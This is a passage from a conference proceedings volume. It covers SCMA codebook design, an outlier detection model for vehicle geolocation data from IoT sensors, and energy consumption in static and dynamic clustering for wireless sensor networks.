where the length of the sequences is equal to M, with x2 = βx1 . Also, we define the ratio R4 between two successive points in the IQ constellation diagram by R2 R1 = R3 = β, the R3 R4 ratio between non-successive points in the IQ constellation diagram by R1 = R2 = α, and θ ∈ [0, 2π]. With (J, M, N, K) = (6, 4, 2, 4), in order to generate the MC defined by Eq. (2), we need to determine the three parameters (α, β, and θ), which help calculate the four radiuses (R1, R2, R3, and R4). We set x1 = R1 andx2 = R2 . According to [9], to maximize the minimum distance between two adjacent points, for the case of a 16 star-QAM: The internal ring has been rotated 22.5 degrees to the external ring, θ = 22.5◦ , and the ratio between the internal radius and the external one turned out to be about 0.63, 1 . β = 0.63 According to [3], to maximize both the sum distance and the MED of the MC, the perfect value is α = 3 which maintains the perfect balance between the two distances. 4.2 Sub-constellation Generation with MED Maximization The codebook elements are built up from sub-constellations derived from the MC, where each codebook row (codebook dimension) is represented by a sub-constellation. In

324

A. Meriem et al.

general, each user needs M = 2m to transmit its data. For a 16 QAM MC, the MC is needed to be divided into df sub-constellations each with M points. The idea behind this algorithm approach is to extract sub-constellations, with the best and maximum MED, from the multiple choices existing from the mother constellation divisions.

4.3 SCMA Codebook Generation by Sub-constellation Mapping with MED Maximization At the end of the division procedure, we have df sub-constellations generated from the mother constellation. The set of these sub-constellations points is denoted as {C1 , C2 . . . .Cdf }, such as each subset contains M constellation points. Next, we map

Design of SCMA Codebook Based on QAM Segmentation Constellation

these sets to the user’s codebook using the mapping matrix F such as:  Ci(r) if fij = 1 CM(i, j) = 0 if fij = 0

325

(4)



With Ci(r) is the r-th value after a specific reordering of the set {C1 , C2 . . . .Cdf }. In the 

mapping matrix F, we replace the elements “1” with Ci(r) . With i denotes the subcarrier corresponding to the i-th row of the matrix, and j denotes the user corresponding to the j-th column of the matrix. In addition to maximize the AP-MED, our objective is to also maximize MED between the user’s codeword with the same carrier. In such a manner, we project the sub-constellations on the overlapping subcarrier, then calculate the distances between the superimposed codewords. The best order of the sets achieving the largest CW-MED is to be taken into consideration to form the desired codebook.

5 Design Example In this section, we generate the SCMA schemes using Matlab. First, generate the mapping matrix F using the PEG algorithm. For (J, M, N, K) = (6, 4, 2, 4) and a symbol degree sequence Ds = {2, 2, 2, 2, 2, 2}, the mapping matrix F is given by:

For α = 3, β = 1.587 and θ = 22.5◦ weset R1 = 1, then R2 = 1.587, R3 = 3, and R4 = 4.7619. Based on (2) the mother constellation MC can be written as: ⎞ 1 1.587 3 4.7619 ⎟ ⎜ −1 −1.587 −3 −4.7619 ⎟ ⎜ MC = ⎜ ⎟ ⎝ 0.9272 + 0.3745i 1.4715 + 0.5944i 2.7816 + 1.1236i 4.4144 + 1.7832i ⎠ −0.9272 − 0.3745i −1.4715 − 0.5944i −2.7816 − 1.1236i −4.4144 − 1.7832i ⎛

(5)

These are the optimum coordinates to construct an Mc with a larger MED. For the number of divisions, we have df = 4, so we derive the four sub-constellations from (5), using Algorithm 2. The resulted sub-constellations at the end are C1 , C2 , C3 and C4 after operating two divisions. At first, the MC had a MED equal to 0.3815, after the two divisions we succeeded to maximize the MED with dmin (C1) = 2.1064, dmin (C2) = 3.3428, dmin (C3) = 2.1064 and dmin (C4) = 3.3428. With U the overlapping users, the optimum U = 3 sub-constellations combination, from {C1 , C2 , C3 , C4 }, that achieve the highest CW-MED are: {C1 , C2 , C4 } and

326

A. Meriem et al.

{C2 , C3 , C4 }. Finally, to form the optimized codebooks, we use Eq. (4) and the two combination sets with the highest CW-MED, as follow: ⎛

CMi,j

C1 ⎜ C2 =⎜ ⎝ 0 0

0 0 C2 C1

C2 0 C4 0

0 C3 0 C4

C4 0 0 C2

⎞ 0 C4 ⎟ ⎟ C1 ⎠ 0

(6)

6 Numerical Results and Analysis

Minimum Euclidean Distance 3

2.11

2.11

2 1

0.3

0.116

0.45

0.547 0.387

0.587

0 Shunlan [2018]

SVD-SCMA [2020] CW-MED

DCSC-SCMA Proposed-SCMA [2021] AP-MED

Fig. 3 Comparison of MED between adjacent points within the same codebook (AP-MED) and comparison of MED of the superimposed codewords (CW-MED).

Figure 3 shows that the proposed codebooks have better performance within the two MEDs, AP-MED and CW-MED. However, our studies were limited to the optimization of the MEDs only, while the other papers investigated more other factors such as: In [6], authors aimed to balance the MC power, making the codebook design under power constraints. Also, with [5] authors focus on designing an MC based on singular value decomposition (SVD), with a higher MED. Then, applying a specific operator to the MC to generate the different user’s codebook in which the AP-MED stay unchangeable. But with our proposed method, we generate different codebooks, each with different distances while the minimum distance is equal to 2.11. Authors in [3] mainly focused on maximizing the AP-MED of the codebook, while neglecting the importance of the CW-MED optimization, so on it resulted with a low CW-MED equal to 0.3. In our paper, we optimized the performance of the codebook first in the AP-MED and then adjust the resulted sub-constellations to achieve high CW-MED.

Design of SCMA Codebook Based on QAM Segmentation Constellation

327

7 Conclusion This paper mainly introduces the detailed procedures of the codebook design: 1) Using PEG algorithm to create the mapping matrix F. 2) Forming the mother constellation, then generating sub-constellations while maximizing the MED criterion. 3) Generating the SCMA codebook by combining the sub-constellation with the mapping matrix, while also maximizing the MED criterion. The comparison shows the good results in term of MED maximization criterion, other domains are further to be studied such as spectral efficiency. Also, the BER simulation of the entire system (transmitter + receiver) is needed to more approve the performance of the proposed codebooks.

References 1. Ding, Z., et al.: Application of non-orthogonal multiple access in LTE and 5G networks. IEEE Commun. Mag. 55(2), 185–191 (2017). https://doi.org/10.1109/MCOM.2017.1500657CM 2. Deka, K., Priyadarsini, M., Sharma, S., Beferull-Lozano, B.: Design of SCMA codebooks using differential evolution. ArXiv200303569 Cs Eess Math, February 2021 (2022). http:// arxiv.org/abs/2003.03569 3. Liu, S., Wang, J., Bao, J., Liu, C.: Optimized SCMA codebook design by QAM constellation segmentation with maximized MED. IEEE Access 6, 63232–63242 (2018). https://doi.org/10. 1109/ACCESS.2018.2876030 4. Wang, Q., Li, T., Feng, R., Yang, C.: An efficient large resource-user scale SCMA codebook design method. IEEE Commun. Lett. 23(10), 1787–1790 (2019). https://doi.org/10.1109/ LCOMM.2019.2929766 5. Vidal Beltran, S., Carreño Aguilera, R., Lopez Bonilla, J.L.: Sparse code multiple access codebook design using singular value decomposition. Fractals 28(07), 2150021 (2020). https:// doi.org/10.1142/S0218348X21500213 6. Hou, Z., Xiang, Z., Ren, P., Cao, B.: SCMA Codebook design based on decomposition of the superposed constellation for AWGN channel. Electronics 10(17), 2112 (2021). https://doi.org/ 10.3390/electronics10172112 7. Healy, C.T.: Novel irregular LDPC codes and their application to iterative detection of MIMO systems, p. 85 (2010) 8. Lisu, Y., Fan, P., Cai, D., Ma, Zheng: Design and analysis of SCMA codebook based on Star-QAM signaling constellations. IEEE Trans. Veh. Technol. 67(11), 10543–10553 (2018). https://doi.org/10.1109/TVT.2018.2865920 9. Celidonio, M., Di Zenobio, D.: An independent sharing of two 16-star QAM broadcast channels. In: Proceedings of 6th International Symposium on Personal, Indoor and Mobile Radio Communications, Toronto, ON, Canada, vol. 1, p. 115-119 (1995). https://doi.org/10.1109/ PIMRC.1995.476415

Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities Moulay Lakbir Tahiri Alaoui(B) , Meryam Belhiah, and Soumia Ziti Intelligent Processing and Security of Systems, Faculty of Sciences, Mohamed V University in Rabat, Rabat, Morocco {lakbir.tahiri,m.belhiah,s.ziti}@um5r.ac.ma

Abstract. In a connected world, the growing attention given to the IoT (Internet of Things) is driven by its economic, societal, and ecological impact among others as well as its vast applications and services. The insights provided by these applications and services are based on the data gathered from different networks of IoT sensors. A poor quality of data forwarded to control centers may lead to ill-informed decisions, inadequate services, and thus impact adversely the business objectives. In this paper, we will address the parameters that influence the levels of Data Quality (DQ) in the context of IoT devices. These issues may be due to errors in measurements, precision of data collection devices, energy restrictions, intermittent connectivity, interference with other devices, sampling frequency, noisy environment, and data volume among others. On the other hand, DQ levels are evaluated against a set of dimensions. Herein, we will focus our research on the most important dimensions for end users, such as accuracy, completeness, and timeliness. Keywords: Internet of Things · Data quality · Outlier Detection

1 Introduction Data quality levels are evaluated against a set of dimensions. They are affected by different IoT layers starting from physical layer to network and application layer. In this paper, we will focus on the data gathered from vehicles that are equipped with IoT sensors along with a GPS/GPRS or an A-GPS/GPRS module for geolocation. As outlier detection (OD) is a major problem in both IoT and DQ domains, it will also be addressed as a sub-domain for DQ. OD is a complex matter since received data which seems to be abnormal may be within the norms. In this case, what is expected to be an outlier may be a valuable information that should not be discarded like in health diagnosis. Many techniques and methods are used for OD, each one is used for specific domains. A model will be developed to detect outliers. Once the model is validated and tested, it will be possible to generalize to other types of IoT data. The first chapter presents the theoretical framework for this work and develops the topics of IoT paradigm, Data Quality and Outlier Detection. Techniques for OD will be © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 328–338, 2023. https://doi.org/10.1007/978-3-031-35251-5_32

Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities

329

presented and classified. We will describe the most used techniques such as statistic-, distance-, density- and learning based methods. In the second chapter, a technique to detect outliers in the field of geolocation data in the context of IoT enabled smart cities will be recommended. We will conclude with the future research direction in the domain of IoT, smart cities and data quality.

2 Related Work 2.1 IoT Paradigm: Definition, Layers and Enabling Technologies The IoT concept was coined by a member of the Radio Frequency Identification (RFID) development community in 1999, and it has recently become more relevant to the practical world largely because of the growth of mobile devices, embedded and ubiquitous communication, cloud computing and data analytics [1]. Internet of things can be defined as a network of physical objects. The internet of things is not only a network of computers, but it has evolved into a network of device of all type and sizes, vehicles, smart phones, home appliances, toys, cameras, medical instruments and industrial systems, animals, people, buildings, all connected ,all communicating & sharing information based on stipulated protocols in order to achieve smart reorganizations, positioning, tracing, safe & control & even personal real time online monitoring , online upgrade, process control & administration [2]. Internet of Things is a concept and a paradigm that considers pervasive presence in the environment of a variety of things/objects that through wireless and wired connections and unique addressing schemes are able to interact with each other and cooperate with other things/objects to create new applications/services and reach common goals. In this context the research and development challenges to create a smart world are enormous. A world where the real, digital and the virtual are converging to create smart environments that make energy, transport, cities and many other areas more intelligent [2]. The goal of the Internet of Things is to enable things to be connected anytime, anywhere, with anything and anyone ideally using any path/network and any service. 2.2 Data Quality: Definition, Dimensions and Issues In the OMB (Office of Management and Budget) guidelines, data quality is expressing data “utility, objectivity, and integrity.” [3] Data Quality may be defined also as “data quality cannot be resumed to data accuracy. Other significant dimensions such as completeness, consistency, and currency are necessary in order to fully characterize the quality of data.” [3] 2.2.1 Data Quality Dimensions “Data of low quality deeply influences the quality of business processes” [3], a number of dimensions is used to measure DQ, accuracy is the most important in IoT [4], it measures the extent to which an observation reflects the real world. It is tidious to detect faults related to accuracy since data control against an authoritative source of reference is required. Then comes timeliness, the IoT data is considered timely when an observation

330

M. L. Tahiri Alaoui et al.

for an object was updated at a desired time of interest [5]. Completeness is an important dimension for DQ measurement it represents the extent to which all expected data is provided by IoT devices [5] The table below (Table 1) summarizes more definitions of the above dimensions: Table 1. Data quality dimensions description Accuracy

Data are accurate when data values registered in the database are equal to realworld values [6, 7] Measures how data is correct, reliable and certified [8] Accuracy compares the proximity of a data value, v, to some other value, v’, that is considered correct [7, 10]

Completeness The ability of an information system to represent every meaningful state of the represented real world system [6, 7] The extent to which data are of sufficient breadth, depth and scope for the task at hand [8] The degree to which values are present in a data collection [9, 7] Percentage of the real- world information entered in the sources and/or the data warehouse [10, 7] Information having all required parts of an entity’s information present [7, 11] Timeliness

The extent to which age of the data is appropriated for the task at hand [8] The delay between a change of a real world state and the resulting modification of the information system state [7, 12] Timeliness has two components: age and volatility. Age or currency is a measure of how old the information is, based on how long age it was recorded. Volatility is a measure of information instability the frequency of change of the value for an entity attribute [7, 11]

2.2.2 Trade-offs Between Dimensions Data quality dimensions are not independent, i.e., correlations exist between them. If one dimension is considered more important than the others for a specific task at hand, then the choice of favoring it may imply negative consequences for the other ones [3].

Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities

331

2.2.3 Data Quality Issues in the Context of IoT Data harvested from different and heterogeneous IoT objects that are spread globally are characterized by different kinds of problems that affect their quality. In the following, we will address the most common problems that impact data quality in the context of IoT. As shown in Fig. 1, the issues may be related to the three IoT layers: physical layer, network layer or application layer.

Fig. 1. Layered distribution of IoT factors [13]

• Problems related to physical layer: • Maintenance: the sensors may be located in a hard to reach area, making maintaining and replacing these devices difficult and costly; • Vandalism: devices are located in public and accessible spaces, thus are an easy prey for all kinds of vandalism; • Faulty devices: A faulty sensor may still generate unsound data which will impact the whole process of executing services and generating business insights; • Sensors constraints: being low cost, sensors are not of the best quality and their capacities are limited. This regards all features as low battery and connectivity. • Problems related to network layer: • Noise: climatic conditions are impacting signal frames received by the sensors; • Security: ciphering gathered data increases the number and size of transmitted packets and computational process/time for encrypting and decrypting transmitted frames which may delay real time insights. • Intermittent connectivity: unreachable devices during data connection frames impacts the receiving and calculating process at the service center; • Interference: with the huge number of heterogeneous devices transmitting at the same time, signals are interfering which reduces received signal quality.

332

M. L. Tahiri Alaoui et al.

• Problems related to application layer: • Heterogeneity: tremendous amounts of data is gathered from different types of sensors in different places of the world which affect the interpretation of the frames. 2.3 Outlier Detection: Definition and Techniques An outlier is a data that deviates from normal behavior. Unexpected values may be considered as measurement errors, sampling errors, but they also can correspond to true values, once the insight is not of a big interest, the outlier may be deleted, considered as a lost data value, an alarm or a warning may be generated but also the data may be an interesting insight that should be exploited. With the thin limit between normal and abnormal behavior, many studies were performed to detect outliers and many techniques were applied. Many techniques that use different methods and algorithms were proposed to address OD (Fig. 2). These methods can be split into categories. For each category, we will propose a description, challenges with the pros and cons.

Fig. 2. Outlier detection methods [14]

• Statistical-based methods: these methods are used to detect sensor faults and outliers once the gathered data follow a known model in case of parametric method. In this case the measurement values are immediately compared with the model and are evaluated as outlier once the data is different from expected values, as shown in Fig. 3 For some statistic methods where the model is not known, we talk about nonparametric methods [14]. For instance, Kernel Density Estimation is using this method to detect outliers: For a given distribution model, this is an efficient method and can be easily implemented, with a low computational cost (does not need many resources regarding computational program, CPU and execution time). In the real world, the distribution is not always known and the method cannot be applied. • Distance-based method: The underlying principle of the distance-based detection algorithms (Fig. 4) focuses on the distance computation between observations [16].

Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities

333

Fig. 3. Outlier statistic-based method. [15]

We can list the method based on distance threshold and also KNN k_Nearest Neighbor. [16] This is a more realistic method since it does not depend on the distribution, it scales for large data comparing to statistical methods but is expensive in multivariate and high dimensional data.

Fig. 4. Outlier distance-based method [17]

334

M. L. Tahiri Alaoui et al.

• Density-based method: In this method an inlier is found in a high density region while an outlier is located in a low density region (Fig. 5). This method is effective but remain unsuitable for large volume of data [15]; We can list LOF (local outlier Factor) as one of the known programs using this technique. [18]

Fig. 5. Outlier density -based method [19]

Other techniques exist for outlier detection like ensemble-based and learning-based methods. The choice of a method depends on many parameters like cost, computational complexity, number of dimensions to take into consideration, volume of the data to process. Each method can be effective for a domain but not for the others. Learning-based approaches which have been applied in many fields, especially in machine learning and deep learning, interact with the user and are efficient in detecting outliers despite its computation cost especially once data size grows. Table 2 summarizes different methods with their advantages and drawbacks

3 Towards a model for outlier detection in IoT-enabled smart cities 3.1 Data Quality for Geolocation Services The application Layer in IoT is growing very fast with a big number of applications related to smart living, smart energy, smart home, smart health, smart industry, and smart transport among others. This work will focus on data gathered from vehicles equipped with IoT modules and GPS (global positioning system) modules for geolocation. As a first step this data

Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities

335

Table 2. Outlier methods advantages and drawbacks Based Method

Advantages

Drawbacks

Statistic

effective for given distribution models

cannot be applied when this distribution is unknown

Distance

does not depend on data distribution

expensive in multivariate and high dimensional data

Density

more effective

remains unsuitable for large data

will be used to develop a model for detecting positions that may represent outliers. Once the model is validated and tested, it will be generalized to other types of data. Data gathered from geolocation modules suffer from the same problems as other data coming from previous sensors, “exact localization may be impossible, e.g., due to nodes lacking Global Positioning System (GPS) access for reasons of cost, energy, or signal unavailability.” [22] Noise and errors that may be present on geolocation data need to be filtered and corrected as a pretreatment phase. The computational program should include the identification of vehicles. Based on methods studied in the previous chapter, below a procedure that can control received data to detect outliers. 3.2 Recommended Method for OD Vehicles having an IoT device are transmitting a number of variables that can be used for geolocation service. Each transmitted frame informs about the vehicle identification, acceleration, speed or velocity, time stamp, location. Velocity is the rate of change of displacement. Acceleration is the rate of change of velocity. For each car there is a maximum value possible for the acceleration, this value is known and given by the vehicle constructor (accelerationmax ). If the received value of acceleration is greater than accelerationmax this value is considered as an outlier. Suppose a vehicle/machine A is moving (being in a moving state will require to have a minimum speed (speedmin ). Once a location is received about this vehicle being in a position (abscissa, ordinate axes and time) C1 (X1, Y1, t1), The next position received in t2 (with a speed speed1 ) should necessary be in a position C2 (X2, Y2,t2) with a distance that cannot exceed speed1 *(t2 -t1 ). A pre-treatment of the sample received can be done to filter data and make sure DQ dimensions have required quality before storing data in the database and control data to verify if any of the variables present an outlier. Having all variables in the frame, (ID, time, Xn, Yn, speed, acceleration) will ensure data is complete, the value of the parameter time will help to decide about the dimension timeliness. Values of the received variables will decide about the data accuracy.

336

M. L. Tahiri Alaoui et al.

The speed being a continuous function and cannot be more than Speedmax allowed, with samples taken in a time intervals the distance C1C2 cannot exceed Speedmax *(t2-t1) and also cannot exceed 1.5*speed1*(t2-t1). Once a vehicle is not moving (for example in a red light), its speed changes promptly with the green light, which is different in case of a car in movement. If the speed at a time tn is 60km/s the speed cannot change to 90km/s for the next sample especially if the sampling period is short. To be efficient, the parameter “speed_new_value” should not exceed 1.5*speedold_value which is granted since the vehicle in movement has a speed greater than speedmin . The direction may change during the movement. With all these conditions the new location will necessarily be in a circle having C1 as a center and C1C2 as a radius. We can conclude also that C1C2 < min (Speedmax *(t2-t1), 1.5*speed1*(t2-t1)). All values in the circle are considered as acceptable values, others are outliers as shown in Fig. 6.

Fig. 6. Outlier detection in case of Geolocation

4 Conclusion Data of low quality is impacting services and citizen’s satisfaction, this study described different DQ challenges related to IoT layers: physical layer, Network layer and application Layer. Data quality is measured via a number of dimensions, Accuracy, completeness and timeliness that are described and studied. OD is a major problem in both IoT and DQ domains, data suspected to be outlier may be a valorous insight that cannot be discarded or ignored especially in sensitive domains.

Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities

337

Different methods and techniques to detect outliers are studied and a comparison between them is presented. Statistical based methods are effective for given distribution models but cannot be applied when this distribution is unknown, distance based methods do not depend on data distribution but are expensive in multivariate and high dimensional data, density based methods are more effective and remain unsuitable for large data. A model for outlier detection in the case of smart cities is presented. Data gathered from IoT sensors placed in vehicles having a GPS module is pre-treated to filter data based on dimensions fixed earlier, the data should be accurate, on time and complete. It should fulfill a number of conditions before proceeding with data analysis. Data having a speed that is unsound, having an acceleration with values that cannot match vehicle characteristics or having an old insight will be filtered and discarded. Other data will be analyzed to check if the received position is an outlier. A calculation is made using received data and previous insight to check whether received location represents an outlier. Data quality is still a fertile field for which studies are still ongoing especially with the fast evolution in all telecommunication subdomains (sensors, transport speed, latency, computational programs, CPU). The choice of a method to detect outliers depend on many parameters. Nowadays we can take benefits from 5G and 6G smart services enabled by UAVs (unmanned aerial vehicles) and wide-range of IOT services. It is important to underline the cost of such services and the reduced coverage for this new technology.

References 1. Patel, K.K., Patel, S.M.: Internet of things-IoT: definition, characteristics, architecture, enabling technologies, application & future challenges. Int. J Eng. Sci. Comput. 6.5 (2016) 2. Vermesan, O., Friess, P., eds.: Internet of things: converging technologies for smart environments and integrated ecosystems. River Publishers (2013) 3. Carey, M.J., et al.: Data-Centric Systems and Applications. Springer, Italy (2006) 4. Liu, C., Nitschke, P., Williams, S.P., Zowghi, D.: Data quality and the internet of things. Computing 102(2), 573–599 (2019). https://doi.org/10.1007/s00607-019-00746-z 5. Li, F., Nastic, S., Dustdar, S.: Data quality observation in pervasive environments. In: Proceeding of the 15th International Conference Computer Science Engineering, pp 602–609. IEEE (2012) 6. Ballou, D.P., Pazer, H.L.: Modeling data and process quality in multi-input, multi-output information systems. Manage. Sci. 31(2), 150–162 (1985) 7. Batini, C., Cappiello, C., et al.: Methodologies for data quality assessment and improvement. ACM Comput. Surv. 41(3), 1–52 (2009). https://doi.org/10.1145/1541880.1541883 8. Wang, R.Y., Strong, D.M.: Beyond accuracy: What data quality means to data consumers. J. Manag. Inf. Syst. 12(4), 5–33 (1996) 9. Redman, T.C., Blanton, A.: Data quality for the information age, 1st Edn., ACM Digital Library, Artech House, Inc., Norwood, MA, USA (1997). [ISBN:0890068836] 10. Jarke, M., Lenzerini, M., et al.: Fundamentals of data warehouses, SIGMOD record, SpringerVerlag, vol 32(2), 55–56 (2003). [ISBN: 3–540–42089–4]

338

M. L. Tahiri Alaoui et al.

11. Bovee, M., Srivastava, R.P., et al.: A conceptual framework and belief-function approach to assessing overall information quality. Int. J. Intell. Syst. 18(1), 51–74 (2003) 12. Wand, Y.W.: Anchoring data quality dimensions in ontological foundation. Communication of the ACM 39(11), 86–95 (1996) 13. Karkouch, A., et al.: Data quality in internet of things: a state-of-the-art survey. Journal of Network and Computer Applications 73 (2016): 57–81.14. Suri, N. N. R. R., M. Murty, and G. Athithan. “Data mining techniques for outlier detection.“ Visual analytics and interactive technologies: data, text and web mining 14. Raju, Anuradha Samkham, Md Mamunur Rashid, and Fariza Sabrina. “Performance Enhancement of Intrusion Detection System Using Machine Learning Algorithms with Feature Selection.“ 2021 31st International Telecommunication Networks and Applications Conference (ITNAC). IEEE (2021) 15. Wang, H., Jaward Bah, M., Hammad, M.: Progress in outlier detection techniques: a survey. IEEE Access 7, 107964–108000 (2019) 16. Erharter, G.H., Marcher, T.: MSAC: towards data driven system behavior classification for TBM tunneling. Tunn. Undergr. Space Technol. 103, 103466 (2020) 17. Smiti, A.: A critical overview of outlier detection methods. Comput. Sci. Rev. 38, 100306 (2020) 18. Chepenko, D.: A density-based algorithm for outlier detection (2018) 19. McGilvray, D.: Executing data quality projects: ten steps to quality data and trusted information. Morgan Kaufmann, Elsevier, Barlington, MA, USA (2008). [ISBN: 978–0–12–374369– 5] 20. Grey, M., et al.: Towards distributed geolocation by employing a delay-based optimization scheme 2014 IEEE Symposium on Computers and Communications (ISCC). IEEE (2014)

Performance Analysis of Static and Dynamic Clustering Protocols for Wireless Sensor Network El Idrissi Nezha(B) and Najid Abdellah Department of Communication Systems, National Institute of Post and Telecommunications (INPT), Rabat, Morocco {elidrissi.nezha,najid}@inpt.ac.ma

Abstract. Power consumption is a critical issue in wireless sensor networks, since sensor nodes are typically battery powered and have limited energy reserves. Energy efficiency is considered one of the most important measures in the energy field. Clustering algorithms are the main techniques to improve the energy efficiency of wireless sensor networks (WSNs). In the clustering algorithm, the sensor nodes are organized into different groups namely clusters managed by a sensor node called Cluster Head (CH). The CH is used to forward data received by its numbers to the base station (BS) for the analysis. In the literature, different Clustering algorithms are proposed either dynamically or statically. The algorithms based on Dynamic Clustering (DC) formed the clusters in each round based on some criteria or randomly in set-up phase. But in the algorithms based on Static Clustering (SC), the clusters are formed only in the first rounds and remains fixed during network operation. Most researchers do not specify the type of clustering used but it can be known from the algorithm. In the paper, we evaluate both algorithms DC and SC to know the optimal algorithms which improve network lifetime and enhance energy in WSNs. The simulation results show that the algorithms based on static clustering is more efficient than other algorithms based on dynamic clustering. Keywords: Wireless sensor networks · Clustering · Cluster head · Selection algorithms · Energy efficient · Hierarchical routing protocol Residual energy · Network lifetime · LEACH

1

·

Introduction

Wireless Sensor Network is widely used in many applications including industrial, security, surveillance...etc. The Wireless Sensor Networks (WSNs) consisting of a huge number of sensor nodes which are connected to each other for communication. the sensors nodes are deployed randomly in the monitoring area to collect data from the environment and sends it to the Base-station (BS) [1]. Energy efficient in WSNs is an important issue today because the sensor c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 339–347, 2023. https://doi.org/10.1007/978-3-031-35251-5_33

340

E. I. Nezha and N. Abdellah

nodes use energy from batteries not rechargeable for sensing the data. thus, it has a limit energy. Hierarchical protocols based on clustering are considered as an efficient routing technique to organize network efficiently and reducing data redundancy compared with non-clustering protocols [2]. In the clustering technique the sensors nodes are organized themselves into cluster each cluster managed by a node namely cluster head (CH) as illustrated in Fig. 1.

Fig. 1. Wireless Sensor Network

The CH aggregates all collected data and sends it to the sink [3]. The existence of a cluster head reduces the number of communications on the network, thus reducing power consumption, and extending the lifetime of the WSNs [4]. Different scenarios are proposed in the context of energy efficiency in WSN using the clustering technique but each scenario considering an environment with a specific placement of the sensor nodes. the same protocol might not work efficiently in other conditions, some of the protocols proposed by many researchers for a specific application [5]. The technique of Clustering has two major tasks, first is the cluster formation and second is selection of CH. Many protocols beginning by selecting the CH taking into consideration different parameters and based on the selection forming the cluster, where each node non-cluster head chooses the near CH [6]. other protocols forming the cluster firstly and choose the CH of each cluster. Clustered node can be static (SC) or dynamic (DC), in networks with SC, the network is divided into many clusters remains fixed during operation of the network, while in DC, the cluster is created in every round of aggregation and transmission as presented in [7]. The works that have studied the performance of wireless sensor networks for improve the Quality of service of the network (QoS) have presented some techniques and algorithms to forming the cluster or to choosing the CH of a cluster by considering different parameters without specifying the technique used if it is a SC or DC [8]. Even though the way in which clusters are formed is very important and influences energy consumption. Thus, in the work we have demonstrated the energy con-

Performance Analysis of Static and Dynamic Clustering

341

sumed in the two types of clustering in order to compare it to evaluate the best way that more efficient energy.

2

Energy Consumption Model

A sensor node uses its energy to perform three main tasks: data acquisition, data processing and transmission (communication). Data acquisition: the energy consumed to perform data acquisition is negligible. Data processing: The energy consumed during data processing will be calculated by applying formula (1): EDA = 5nj\bit\signal

(1)

Therefore, the data processing is infinitely less expensive than its transmission. Communication: data transmission or reception operations consume much more energy than other tasks. The radio hardware energy consumption model is presented in Fig. 2.

Fig. 2. Radio Dissipation Model

if the distance between the transmitter and receiver is less than a threshold value d0 , a free space model (d2 power loss) is used. If this is not the case, a multi-path fading channel model (d4 power loss) is adopted. Energy consumption of nodes when transmitting or receiving l-bit data at d distance is calculated as Formula 2 and 3 respectively.  Tx l ∗ Eelec + l ∗ εf s ∗ d 2 , d < d 0 ET X (l, d) = (2) Tx l ∗ Eelec + l ∗ εmp ∗ d4 , d ≥ d0 ERx (l) = l ∗ Eelec

(3)

where Eelec is the energy consumption of the transmitter or receiving circuit per bit. d0 represents the distance threshold. When d < d0 , we adopt the εf s to calculate ET x (l, d) on the other hand, we can adopt the εmp to calculate ET x (l, d). d0 can be calculated by formula (4):  εf s (4) εmp

342

3

E. I. Nezha and N. Abdellah

Energy Consumed in Dynamic Clustering (set-Up Phase)

Cluster formation, in which each node broadcast a message minf in a distance d with some information such as id, position, energy level or randomly generated number for selection CH. All the nodes in the network received multiple minf from their neighbors (M messages). So, the energy consumption in the phase can be calculated by formula (5): etx (minf , d) = minf ∗ Eelec + εf s ∗ d2

(5)

erx (minf ) = M ∗ (mch ∗ Eelec )

(6)

Next, elected CH broadcasts a CH message mch . The energy consumed by the CH to broadcast mch is given by the following equation: etx (mch , d) = mch ∗ Eelec + εf s ∗ d2

(7)

A non-CH node receiving multiple mch and selects the closest CH. erx (mch ) = K ∗ (mch ∗ Eelec )

(8)

With K, the number of CH elected it is equal to the number of clusters that will be formed. Next the non-CH node transmits a message of a membership request message mreq to it CH. etx (mreq , d(nch )) = mreq ∗ Eelec + εf s ∗ d(nch )2

(9)

With d(nch ) the distance between node and its CH. erx (mreq ) = mreq ∗ Eelec

(10)

The CH receive the request message of its numbers and formed the cluster, each CH transmits its TDMA program to its cluster members. etx (mtdm , d(nch )) = mtdm ∗ Eelec + εf s ∗ d(nCH )2

(11)

erx (mtdm ) = mtdm ∗ Eelec

(12)

So, the total energy consumption in round ri for forming the clusters is given by the flowing equation: ri Eset−up = N ∗ (etx (minf , d) + erx (minf , d))

+K ∗ (etx (mch , d) + etx (mtdm , d(nch ))) +(N − K) ∗ (K ∗ erx (mch ) + etx (mreq , d(nch )) + erx (mtdm ))

(13)

With N the total number of node and K the number of clusters. We assume that the value of the energy consumed in the transmission or reception exchange messages is the same, so the equation becomes as follows: 1 1 1 ri Eset−up = 2etx ( N + K + (N − K)) + 2erx ( K + N + (N − K)K) 2 2 2

(14)

Performance Analysis of Static and Dynamic Clustering

343

ri In the DC the Eset−up is consumed at the beginning of each round. It is mean that the overhead of dynamic clustering is calculated by the equation:

T otal Eset−up

=

r max

ri Eset−up

(15)

i=0

although the size of the messages is very small but the rate of communication in each round is important. moreover, the nodes must be always listening to receive warning messages from their neighbors to form the clusters. but the main role of the nodes is to transmit data from the environment. So, they must conserve the maximum energy to do its main role.

4

Energy Consumed in Static Clustering

Static clustering is a method that forms clusters only once at the beginning of network operation . the clusters can be formed by the base station (centralized clustering system), or by the exchange of messages contains the coordinates of the nodes (Self-organizing) so, that each node identifies its cluster. there are several ways to form clusters in this article we present a simple method called geographical clusters Gj − cluster this method is used in our work already published (EAC-ECHS) [9]. In Gj − cluster the area of interest already divided in cluster geographically that is means the coordinates Gj (xi , yi ) of each cluster and predefined so each node must check its position to identify its cluster they use the following equation:  XCj < XCi < XCj+1 (16) ni ∈ Ci ⇒ YCj < YCi < YCj+1 The clusters will be fixed during the operation of the network. Energy consumed in Gj − cluster method for forming the cluster is null because the clusters are formed without communication between the nodes. But the nodes must determine their neighbors to choose the CH. To choose the CH of the formed clusters, each node calculates the Vcch (CH candidate value) by the following equation: Vcch =

Er (ni ) dBS (ni )

(17)

